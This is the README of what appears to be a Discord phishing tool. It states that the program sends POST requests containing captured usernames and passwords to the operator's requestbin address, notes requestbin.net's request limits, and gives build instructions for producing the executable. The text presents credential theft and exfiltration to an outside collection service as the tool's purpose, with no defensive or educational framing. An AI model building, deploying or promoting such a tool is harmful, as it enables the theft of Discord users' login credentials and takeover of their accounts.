MorphaxTheDeveloper/discord-phising-script/README.md

 The program send post requests to your requestbin adress.(The post requests includes username/password data)

 Requestbins have a limit (2 day,20 request max. for the "requestbin.net")

+Note:build the sln file then take the exe file from debug folder.